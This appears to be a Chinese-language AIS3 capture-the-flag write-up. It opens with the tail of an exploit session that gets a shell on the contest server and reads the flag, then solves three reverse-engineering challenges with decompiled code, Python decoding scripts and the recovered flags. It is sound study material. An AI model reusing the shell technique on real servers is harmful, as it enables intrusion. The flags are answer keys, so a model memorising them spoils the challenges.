    IBT:        Enabled
10
    Stripped:   No
11
[x] Opening connection to chals1.ais3.org on port 60[▁] Opening connection to chals1.ais3.org on port 60403:Opening connection to chals1.ais3.org on port 60[+]  Done
12
[*] Switching to interactive mode
13
 🎸 歡迎來到 Ave Mujica 的世界...🎭
14
由 豐川集團 獨家冠名贊助
15
ト（😮T）
16
ガ（😃G）
17
ワ（😉W）
18
グルー（😄👐）プ
19
立希漂亮漂亮漂亮
20
海鈴帥氣帥氣帥氣
21
$ cat flag
22
AIS3{Ave Mujica🎭將奇蹟帶入日常中🛐(Fortuna💵💵💵)...Ave Mujica🎭為你獻上慈悲憐憫✝️(Lacrima😭🥲💦)..._f8 8950d30bae763ad176c839f48fbd326}
23
$
24
[*] Interrupted
25
[*] Closed connection to chals1.ais3.org port 60403

[AIS3 Tiny Server - Reverse]

在ida逆向後有看到一個神秘的東西

1
BOOL __cdecl sub_1E20(int a1)
2
{
3
  unsigned int v1; // ecx
4
  char v2; // si
5
  char v3; // al
6
  int i; // eax
7
  char v5; // dl
8
  _BYTE v7[10]; // [esp+7h] [ebp-49h] BYREF
9
  int v8[11]; // [esp+12h] [ebp-3Eh]
10
  __int16 v9; // [esp+3Eh] [ebp-12h]
11

12
  v1 = 0;
13
  v2 = 51;
14
  v9 = 20;
15
  v3 = 114;
16
  v8[0] = 1480073267;
17
  v8[1] = 1197221906;
18
  v8[2] = 254628393;
19
  v8[3] = 920154;
20
  v8[4] = 1343445007;
21
  v8[5] = 874076697;
22
  v8[6] = 1127428440;
23
  v8[7] = 1510228243;
24
  v8[8] = 743978009;
25
  v8[9] = 54940467;
26
  v8[10] = 1246382110;
27
  qmemcpy(v7, "rikki_l0v3", sizeof(v7));
28
  while ( 1 )
29
  {
30
    *((_BYTE *)v8 + v1++) = v2 ^ v3;
31
    if ( v1 == 45 )
32
      break;
33
    v2 = *((_BYTE *)v8 + v1);
34
    v3 = v7[v1 % 0xA];
35
  }
36
  for ( i = 0; i != 45; ++i )
37
  {
38
    v5 = *(_BYTE *)(a1 + i);
39
    if ( !v5 || v5 != *((_BYTE *)v8 + i) )
40
      return 0;
41
  }
42
  return *(_BYTE *)(a1 + 45) == 0;
43
}

回推即可

1
import struct
2

3
v8_ints = [
4
    1480073267, 1197221906, 254628393,  920154, 1343445007,
5
    874076697, 1127428440, 1510228243, 743978009, 54940467,
6
    1246382110
7
]
8
seed = b"".join(struct.pack("<I", x) for x in v8_ints) + bytes([20])
9
key  = b"rikki_l0v3"
10

11
v2, v3 = 0x33, 0x72
12
flag = bytearray(45)
13

14
for i in range(45):
15
    flag[i] = v2 ^ v3
16
    if i == 44:
17
        break
18
    v2 = seed[i + 1]
19
    v3 = key[(i + 1) % len(key)]
20

21
print(flag.decode())

1
[01:47:02] ~/Documents/code  MacOS/daily/PLAYGROUND FOLDER/py ➜ /usr/local/bin/python3 "/Users/yih_0118/Documents/code  MacOS/daily/PLAYGROUND FOLDER/py/250.p
2
y"
3
AIS3{w0w_a_f1ag_check3r_1n_serv3r_1s_c00l!!!}

[web flag checker]

要去逆向index.wasm 先把 wasm 轉成 wat 再decompile一次會看到flagchcker的部分

1
export function flagchecker(a:int):int { // func9
2
  var b:int = g_a;
3
  var c:int = 96;
4
  var d:int = b - c;
5
  g_a = d;
6
  d[22]:int = a;
7
  var e:int = -39934163;
8
  d[21]:int = e;
9
  var f:int = 64;
10
  var g:long_ptr = d + f;
11
  var h:long = 0L;
12
  g[0] = h;
13
  var i:int = 56;
14
  var j:long_ptr = d + i;
15
  j[0] = h;
16
  var k:int = 48;
17
  var l:long_ptr = d + k;
18
  l[0] = h;
19
  d[5]:long = h;
20
  d[4]:long = h;
21
  var m:long = 7577352992956835434L;
22
  d[4]:long = m;
23
  var n:long = 7148661717033493303L;
24
  d[5]:long = n;
25
  var o:long = -7081446828746089091L;
26
  d[6]:long = o;
27
  var p:long = -7479441386887439825L;
28
  d[7]:long = p;
29
  var q:long = 8046961146294847270L;
30
  d[8]:long = q;
31
  var r:int = d[22]:int;
32
  var s:int = 0;
33
  var t:int = r != s;
34
  var u:int = 1;
35
  var v:int = t & u;
36
  if (eqz(v)) goto B_c;
37
  var w:int = d[22]:int;
38
  var x:int = f_n(w);
39
  var y:int = 40;
40
  var z:int = x != y;
41
  var aa:int = 1;
42
  var ba:int = z & aa;
43
  if (eqz(ba)) goto B_b;
44
  label B_c:
45
  var ca:int = 0;
46
  d[23]:int = ca;
47
  goto B_a;
48
  label B_b:
49
  var da:int = d[22]:int;
50
  d[7]:int = da;
51
  var ea:int = 0;
52
  d[6]:int = ea;
53
  loop L_e {
54
    var fa:int = d[6]:int;
55
    var ga:int = 5;
56
    var ha:int = fa < ga;
57
    var ia:int = 1;
58
    var ja:int = ha & ia;
59
    if (eqz(ja)) goto B_d;
60
    var ka:int = d[7]:int;
61
    var la:int = d[6]:int;
62
    var ma:int = 3;
63
    var na:int = la << ma;
64
    var oa:long_ptr = ka + na;
65
    var pa:long = oa[0];
66
    d[2]:long = pa;
67
    var qa:int = d[6]:int;
68
    var ra:int = 6;
69
    var sa:int = qa * ra;
70
    var ta:int = -39934163;
71
    var ua:int = ta >> sa;
72
    var va:int = 63;
73
    var wa:int = ua & va;
74
    d[3]:int = wa;
75
    var xa:long = d[2]:long;
76
    var ya:int = d[3]:int;
77
    var za:long = f_i(xa, ya);
78
    var ab:int = d[6]:int;
79
    var bb:int = 32;
80
    var cb:int = d + bb;
81
    var db:int = cb;
82
    var eb:int = 3;
83
    var fb:int = ab << eb;
84
    var gb:long_ptr = db + fb;
85
    var hb:long = gb[0];
86
    var ib:int = za != hb;
87
    var jb:int = 1;
88
    var kb:int = ib & jb;
89
    if (eqz(kb)) goto B_f;
90
    var lb:int = 0;
91
    d[23]:int = lb;
92
    goto B_a;
93
    label B_f:
94
    var mb:int = d[6]:int;
95
    var nb:int = 1;
96
    var ob:int = mb + nb;
97
    d[6]:int = ob;
98
    continue L_e;
99
  }
100
  label B_d:
101
  var pb:int = 1;
102
  d[23]:int = pb;
103
  label B_a:
104
  var qb:int = d[23]:int;
105
  var rb:int = 96;
106
  var sb:int = d + rb;
107
  g_a = sb;
108
  return qb;
109
}

逆向拼回去就好了

1
C = [
2
    0x69282A668AEF666A,
3
    0x633525F4D7372337,
4
    0x9DB9A5A0DCC5DD7D,
5
    0x9833AFAFB8381A2F,
6
    0x6FAC8C8726464726,
7
]
8

9
MASK64 = (1 << 64) - 1
10
rot_l  = lambda x, s: ((x << s) | (x >> (64 - s))) & MASK64
11
rot_r  = lambda x, s: ((x >> s) | (x << (64 - s))) & MASK64
12

13
SH = [((-39934163) >> (i * 6)) & 0x3F for i in range(5)]
14

15
blocks = [rot_r(v, s).to_bytes(8, "little") for v, s in zip(C, SH)]
16

17
flag = b"".join(blocks).decode()
18
print(flag)

1
[02:01:56] ~/Documents/code  MacOS/daily/PLAYGROUND FOLDER/py ➜ /usr/local/bin/python3 "/Users/yih_0118/Documents/code  MacOS/daily/PLAYGROUND FOLDER/py/252.p
2
y"
3
AIS3{W4SM_R3v3rsing_w17h_g0_4pp_39229dd}

[A_simple_snake_game]

一個貪吃蛇的遊戲，慢慢去翻，翻到一個神奇的東西

1
// -----------------------------------------------------
2
// Function: __ZN9SnakeGame6Screen8drawTextEii
3
// Address: 0x4029ba
4
// -----------------------------------------------------
5
void __userpurge SnakeGame::Screen::drawText(_DWORD *a1@<ecx>, SnakeGame::Screen *this, int a3, int a4)
6
{
7
  unsigned int v4; // eax
8
  int v5; // eax
9
  char *v6; // eax
10
  char *Error; // eax
11
  int v8; // eax
12
  char v9; // [esp+13h] [ebp-F5h]
13
  char lpuexcpt; // [esp+14h] [ebp-F4h]
14
  struct _Unwind_Exception *lpuexcpta; // [esp+14h] [ebp-F4h]
15
  struct _Unwind_Exception *lpuexcptb; // [esp+14h] [ebp-F4h]
16
  int v14[10]; // [esp+5Dh] [ebp-ABh] BYREF
17
  __int16 v15; // [esp+85h] [ebp-83h]
18
  char v16; // [esp+87h] [ebp-81h]
19
  int v17; // [esp+88h] [ebp-80h]
20
  int v18; // [esp+8Ch] [ebp-7Ch]
21
  int v19; // [esp+90h] [ebp-78h]
22
  int v20; // [esp+94h] [ebp-74h]
23
  int v21; // [esp+98h] [ebp-70h]
24
  char v22[24]; // [esp+9Ch] [ebp-6Ch] BYREF
25
  int v23; // [esp+B4h] [ebp-54h]
26
  int v24; // [esp+B8h] [ebp-50h]
27
  int v25; // [esp+BCh] [ebp-4Ch]
28
  int v26; // [esp+C0h] [ebp-48h]
29
  int v27; // [esp+C4h] [ebp-44h]
30
  char v28[27]; // [esp+C8h] [ebp-40h] BYREF
31
  char v29; // [esp+E3h] [ebp-25h] BYREF
32
  int TextureFromSurface; // [esp+E4h] [ebp-24h]
33
  int v31; // [esp+E8h] [ebp-20h]
34
  unsigned int i; // [esp+ECh] [ebp-1Ch]
35

36
  if ( (int)this <= 11451419 || a3 <= 19810 )
37
  {
38
    SnakeGame::Screen::createText[abi:cxx11](v28, (int)a1, (int)this, a3);
39
    v27 = 0xFFFFFF;
40
    v8 = std::string::c_str(v28);
41
    a1[3] = TTF_RenderText_Solid(a1[5], v8, 0xFFFFFF);
42
    a1[4] = SDL_CreateTextureFromSurface(a1[1], a1[3]);
43
    v23 = 400;
44
    v24 = 565;
45
    v25 = 320;
46
    v26 = 30;
47
    SDL_RenderCopy(a1[1], a1[4]);
48
    std::string::~string(v28);
49
  }
50
  else
51
  {
52
    v14[0] = -831958911;
53
    v14[1] = -1047254091;
54
    v14[2] = -1014295699;
55
    v14[3] = -620220219;
56
    v14[4] = 2001515017;
57
    v14[5] = -317711271;
58
    v14[6] = 1223368792;
59
    v14[7] = 1697251023;
60
    v14[8] = 496855031;
61
    v14[9] = -569364828;
62
    v15 = 26365;
63
    v16 = 40;
64
    std::allocator<char>::allocator(&v29);
65
    std::string::basic_string(v14, 43, &v29);
66
    std::allocator<char>::~allocator(&v29);
67
    for ( i = 0; ; ++i )
68
    {
69
      v4 = std::string::length(v22);
70
      if ( i >= v4 )
71
        break;
72
      lpuexcpt = *(_BYTE *)std::string::operator[](i);
73
      v9 = SnakeGame::hex_array1[i];
74
      *(_BYTE *)std::string::operator[](i) = v9 ^ lpuexcpt;
75
    }
76
    v21 = 0xFFFFFF;
77
    v5 = std::string::c_str(v22);
78
    v31 = TTF_RenderText_Solid(a1[5], v5, v21);
79
    if ( v31 )
80
    {
81
      TextureFromSurface = SDL_CreateTextureFromSurface(a1[1], v31);
82
      if ( TextureFromSurface )
83
      {
84
        v17 = 200;
85
        v18 = 565;
86
        v19 = 590;
87
        v20 = 30;
88
        SDL_RenderCopy(a1[1], TextureFromSurface);
89
        SDL_FreeSurface(v31);
90
        SDL_DestroyTexture(TextureFromSurface);
91
      }
92
      else
93
      {
94
        lpuexcptb = (struct _Unwind_Exception *)std::operator<<<std::char_traits<char>>(
95
                                                  (std::ostream::sentry *)&std::cerr,
96
                                                  "SDL_CreateTextureFromSurface: ");
97
        Error = (char *)SDL_GetError();
98
        std::operator<<<std::char_traits<char>>((std::ostream::sentry *)lpuexcptb, Error);
99
        std::ostream::operator<<(std::endl<char,std::char_traits<char>>);
100
        SDL_FreeSurface(v31);
101
      }
102
    }
103
    else
104
    {
105
      lpuexcpta = (struct _Unwind_Exception *)std::operator<<<std::char_traits<char>>(
106
                                                (std::ostream::sentry *)&std::cerr,
107
                                                "TTF_RenderText_Solid: ");
108
      v6 = (char *)SDL_GetError();
109
      std::operator<<<std::char_traits<char>>((std::ostream::sentry *)lpuexcpta, v6);
110
      std::ostream::operator<<(std::endl<char,std::char_traits<char>>);
111
    }
112
    std::string::~string(v22);
113
  }
114
}

感覺就是很像有flag的地方，把它拼回去吧

1
import struct
2

3
v14 = [
4
    -831958911, -1047254091, -1014295699, -620220219,
5
    2001515017, -317711271, 1223368792, 1697251023,
6
    496855031, -569364828
7
]
8

9
v15 = 26365
10
v16 = 40
11

12
ciphertext = b''.join(struct.pack('<i', x) for x in v14)
13
ciphertext += struct.pack('<H', v15)
14
ciphertext += struct.pack('<B', v16)
15

16
hex_array1 = bytes.fromhex(
17
    "C0 19 3A FD CE 68 DC F2 0C 47 D4 86 AB 57 39 B5"
18
    "3A 8D 13 47 3F 7F 71 98 6D 13 B4 01 90 9C 46 3A"
19
    "C6 33 C2 7F DD 71 78 9F 93 22 55"
20
)
21

22
flag = bytes(c ^ k for c, k in zip(ciphertext, hex_array1))
23
print(flag.decode())

1
[02:01:01] ~/Documents/code  MacOS/daily/PLAYGROUND FOLDER/py ➜ /usr/local/bin/python3 "/Users/yih_0118/Documents/code  MacOS/daily/PLAYGROUND FOLDER/py/251.py"
2
AIS3{CH3aT_Eng1n3?_0fcau53_I_bo_1T_by_hAnD}

結果

Thanks for reading!